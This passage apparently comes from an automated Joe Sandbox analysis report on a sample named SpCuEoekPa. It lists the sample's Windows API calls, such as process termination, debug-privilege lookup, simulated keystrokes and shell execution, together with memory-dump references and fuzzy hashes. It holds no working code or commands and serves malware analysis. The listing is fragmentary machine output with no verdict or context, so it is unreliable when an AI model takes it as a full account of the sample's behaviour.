                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
                                                            • Instruction ID: c518a42cdcab5a9d56a96c0dac2c18090ab6b936ae15b6982e32f8d4e2760f91
                                                            • Opcode Fuzzy Hash: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
                                                            • Instruction Fuzzy Hash: 905165B20083859BC726EB60D895EDFB3ECAF85350F40492EF585D7152EF70A688C756
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003E86FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
                                                            • Instruction ID: 0524806be2f364ec5b5395a8147dd65dd199e8f0b018ec60b1b487f5f893ae3e
                                                            • Opcode Fuzzy Hash: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
                                                            • Instruction Fuzzy Hash: 0D51B530A002E4BFDF229F26CC85FAD7B68AB05310F614715FA59EA1E0CF71A980DB40
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0039C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0039C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0039C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0039C370
                                                            • DestroyIcon.USER32(00000000), ref: 0039C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0039C39C
                                                            • DestroyIcon.USER32(?), ref: 0039C3AB
                                                              • Part of subcall function 003EA4AF: DeleteObject.GDI32(00000000), ref: 003EA4E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
                                                            • Instruction ID: 3bba8f2ecf74d22c9e3f017e1edc3b86fea46967909e6d64f232d77293b5ec6e
                                                            • Opcode Fuzzy Hash: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
                                                            • Instruction Fuzzy Hash: 14517C74610605AFDF22DF64CC85FAB3BB9EB08310F118628F9429B2D0D7B0AD90DB50
                                                            APIs
                                                              • Part of subcall function 003BA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BA84C
                                                              • Part of subcall function 003BA82C: GetCurrentThreadId.KERNEL32 ref: 003BA853
                                                              • Part of subcall function 003BA82C: AttachThreadInput.USER32(00000000,?,003B9683,?,00000001), ref: 003BA85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003B96AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003B96AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003B96D5
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003B96F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
                                                            • Instruction ID: 5d61e4cf4015083de972b247b9499f2ac73a87fb6daf043890d7de454b75d611
                                                            • Opcode Fuzzy Hash: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
                                                            • Instruction Fuzzy Hash: AD11CEB1910618BFF6226B60DC89FAA7F2DEB4C764F100525F344AF1E0C9F25C109AA4
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 003B892A
                                                            • HeapAlloc.KERNEL32(00000000), ref: 003B8931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 003B8946
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 003B894E
                                                            • DuplicateHandle.KERNEL32(00000000), ref: 003B8951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 003B8961
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 003B8969
                                                            • DuplicateHandle.KERNEL32(00000000), ref: 003B896C
                                                            • CreateThread.KERNEL32(00000000,00000000,003B8992,00000000,00000000,00000000), ref: 003B8986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
                                                            • Instruction ID: cfb14c482e2fceb6f6a2920f2038ac54513626d741ee901c6d8e3c831c874592
                                                            • Opcode Fuzzy Hash: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
                                                            • Instruction Fuzzy Hash: F401AC75240348FFE621ABA5DC89F673B6CEB89711F418521FA05DF1D1CAB09800CA20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 27a04a1f557f2208cab64dc96c0a8be803c00b0426a074670c959dda240de773
                                                            • Instruction ID: 0855be69574a56336767982d699426c0ff42bf74c5f77b6e3b17c248ef952b76
                                                            • Opcode Fuzzy Hash: 27a04a1f557f2208cab64dc96c0a8be803c00b0426a074670c959dda240de773
                                                            • Instruction Fuzzy Hash: F4C19372A002199FDF11DF98E884BAEB7F9FB48314F15856BE905AB380E7709D45CB90
                                                            APIs
                                                              • Part of subcall function 003B710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
                                                              • Part of subcall function 003B710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
                                                              • Part of subcall function 003B710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
                                                              • Part of subcall function 003B710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003D9806
                                                            • _memset.LIBCMT ref: 003D9813
                                                            • _memset.LIBCMT ref: 003D9956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003D9982
                                                            • CoTaskMemFree.OLE32(?), ref: 003D998D
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 003D99DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: eabd3fc43c0912d0ccba791f3388cdb19cbe9a935ead57d782e95e3c29d713ca
                                                            • Instruction ID: 0d10bd74bb95c825e84af7af6f581df7de1f77f251985e7d3ae3a9a38b988c40
                                                            • Opcode Fuzzy Hash: eabd3fc43c0912d0ccba791f3388cdb19cbe9a935ead57d782e95e3c29d713ca
                                                            • Instruction Fuzzy Hash: 64913B72D00229EBDB12DFA5DC45EDEBBB9EF08310F10815AF519AB291DB715A44CFA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E6E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 003E6E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E6E52
                                                            • _wcscat.LIBCMT ref: 003E6EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 003E6EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E6EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
                                                            • Instruction ID: cc72d41dd03978ca9261e90a77b88afcbed7ff1a9e3d4a25ed0f7abd1a59bfd1
                                                            • Opcode Fuzzy Hash: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
                                                            • Instruction Fuzzy Hash: FE41A370A00398EFDB229F64CC86BEE77A8EF58390F11462AF584EB1D1D6719D848B50
                                                            APIs
                                                              • Part of subcall function 003C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003C3C7A
                                                              • Part of subcall function 003C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003C3C88
                                                              • Part of subcall function 003C3C55: CloseHandle.KERNEL32(00000000), ref: 003C3D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9A4
                                                            • GetLastError.KERNEL32 ref: 003DE9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 003DEA63
                                                            • GetLastError.KERNEL32(00000000), ref: 003DEA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 003DEAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 003C3033
                                                            Strings
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003C4312
                                                            • LoadStringW.USER32(00000000), ref: 003C4319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003C432F
                                                            • LoadStringW.USER32(00000000), ref: 003C4336
                                                            • _wprintf.LIBCMT ref: 003C435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 003C4357
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 003ED47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 003ED49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003ED6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003ED6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003ED716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 003ED735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 003ED75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 003ED77D
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 00362ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00362B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C286
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 003C70DD
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003C7114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 003C7130
                                                            • _memmove.LIBCMT ref: 003C717E
                                                            • _memmove.LIBCMT ref: 003C719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 003C71AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003C71BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C71DE
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 003E61EB
                                                            • GetDC.USER32(00000000), ref: 003E61F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E61FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 003E620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003E6246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E6257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003E902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003E6291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E62B1
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • _wcstok.LIBCMT ref: 003CEC94
                                                            • _wcscpy.LIBCMT ref: 003CED23
                                                            • _memset.LIBCMT ref: 003CED56
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003D6C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003D6C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D6C34
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 003D6CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 003D6CA7
                                                              • Part of subcall function 003BA7E9: _strlen.LIBCMT ref: 003BA7F3
                                                              • Part of subcall function 003BA7E9: _memmove.LIBCMT ref: 003BA815
                                                            • _strlen.LIBCMT ref: 003D6D44
                                                            • _memmove.LIBCMT ref: 003D6DAD
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • IsWindow.USER32(01645CF8), ref: 003EB3EB
                                                            • IsWindowEnabled.USER32(01645CF8), ref: 003EB3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003EB4DB
                                                            • SendMessageW.USER32(01645CF8,000000B0,?,?), ref: 003EB512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 003EB54F
                                                            • GetWindowLongW.USER32(01645CF8,000000EC), ref: 003EB571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003EB589
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
                                                            • Instruction ID: bf6cffbe150812b1b1a0c0d27be1e129cff9be9121a846c6c4e329ea8120c855
                                                            • Opcode Fuzzy Hash: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
                                                            • Instruction Fuzzy Hash: 9F718B346042A4AFDB239F56C8D1FBBBBA9EF09300F154269E945972E2C771A940CF50
                                                            APIs
                                                            • _memset.LIBCMT ref: 003DF448
                                                            • _memset.LIBCMT ref: 003DF511
                                                            • ShellExecuteExW.SHELL32(?), ref: 003DF556
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 003DF5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 003DF5FC
                                                            Strings
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: dc6aef1fae80cf50aaee6f9bc34cd946dedc0d37071103004896635022b38fa1
                                                            • Instruction ID: bcdc562b8757cc9a55dcf18d39128c73721026ea235b7ff3edbe93303d6358ff
                                                            • Opcode Fuzzy Hash: dc6aef1fae80cf50aaee6f9bc34cd946dedc0d37071103004896635022b38fa1
                                                            • Instruction Fuzzy Hash: DC619075A00619DFCF16EFA4D4819AEBBF5FF49314F14806AE85AAB351CB30AD41CB90
                                                            APIs
                                                            • GetParent.USER32(?), ref: 003C0F8C
                                                            • GetKeyboardState.USER32(?), ref: 003C0FA1
                                                            • SetKeyboardState.USER32(?), ref: 003C1002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 003C1030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 003C104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 003C1095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003C10B8
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
                                                            • Instruction ID: c8625fc1d9ed665f6f0e49ad284bb040297aea92aaffaf250131cadc1a9e4352
                                                            • Opcode Fuzzy Hash: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
                                                            • Instruction Fuzzy Hash: 7651CFA05046D57DFB3742348C55FBABEA96B07304F09858DE1D4CA8D3C2D9ACD8E751
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 003C0DA5
                                                            • GetKeyboardState.USER32(?), ref: 003C0DBA
                                                            • SetKeyboardState.USER32(?), ref: 003C0E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003C0E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003C0E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003C0EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003C0EC9
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
                                                            • Instruction ID: 2f009db5b477ad21b6e93d35450907194b5f3e92229310a909daf833d3e7a168
                                                            • Opcode Fuzzy Hash: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
                                                            • Instruction Fuzzy Hash: 2A5105A0544BD5BDFB3B83748C55F7ABEA95B06300F08898DE1D5DA8C3C395AC88E760
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
                                                            • Instruction ID: add3ac2ef1f3c15f229b22168e4957a07f960fa1781d0cc4e557a637d3856c08
                                                            • Opcode Fuzzy Hash: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
                                                            • Instruction Fuzzy Hash: 91417375C1171876CB13FBF48C86ACFB3B89F05310F508996E918E7221EB34A695C7A6
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003BD60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003BD61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003BD69D
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,?$DllGetClassObject
                                                            • API String ID: 753597075-2169313111
                                                            • Opcode ID: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
